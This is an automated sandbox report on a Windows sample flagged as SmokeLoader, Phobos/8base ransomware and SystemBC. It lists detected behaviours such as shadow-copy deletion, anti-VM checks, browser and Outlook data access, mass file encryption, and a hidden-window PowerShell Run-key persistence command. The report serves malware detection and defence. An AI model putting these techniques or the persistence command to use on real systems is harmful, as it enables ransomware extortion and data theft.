Malware Analysis Report

2024-11-16 12:19

Sample ID 230626-fe4ycahe5z
Target 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27
SHA256 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27

Threat Level: Known bad

The file 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27 was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida

Phobos

SystemBC

SmokeLoader

Modifies boot configuration data using bcdedit

Renames multiple (451) files with added filename extension

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Deletes shadow copies

Downloads MZ/PE file

Deletes backup catalog

Modifies Windows Firewall

Executes dropped EXE

Deletes itself

Checks BIOS information in registry

Obfuscated with Agile.Net obfuscator

Themida packer

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Accesses Microsoft Outlook profiles

Adds Run key to start application

Checks whether UAC is enabled

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

outlook_office_path

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-26 04:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-26 04:48

Reported

2023-06-26 04:53

Platform

win7-20230621-en

Max time kernel

300s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Network

N/A

Files

memory/1064-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1064-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2040-57-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1064-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1064-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1220-59-0x0000000002240000-0x0000000002256000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-26 04:48

Reported

2023-06-26 04:53

Platform

win10-20230621-en

Max time kernel

300s

Max time network

264s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\FFA2.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (451) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\FFA2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\FFA2.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\233.exe C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\233 = "C:\\Users\\Admin\\AppData\\Local\\233.exe" C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\233 = "C:\\Users\\Admin\\AppData\\Local\\233.exe" C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\3F9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3F9.exe'\"" C:\Users\Admin\AppData\Local\Temp\3F9.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\FFA2.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\$RECYCLE.BIN\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\DailyChallenges\SmallSpiderTile.jpg C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\agavedefaulticon96x96.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-40_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Microsoft.Graphics.Canvas.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Animation\coin-partcles-landing.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sk.pak C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\JAWTAccessBridge-64.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HalfPrice3.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\cardback.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutImage.layoutdir-RTL.gif C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sv-se.dll.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.png.id[5C6843C2-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_13c.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-48.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\233.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\WindowsAccessBridge-64.dll C:\Users\Admin\AppData\Local\Temp\233.exe N/A
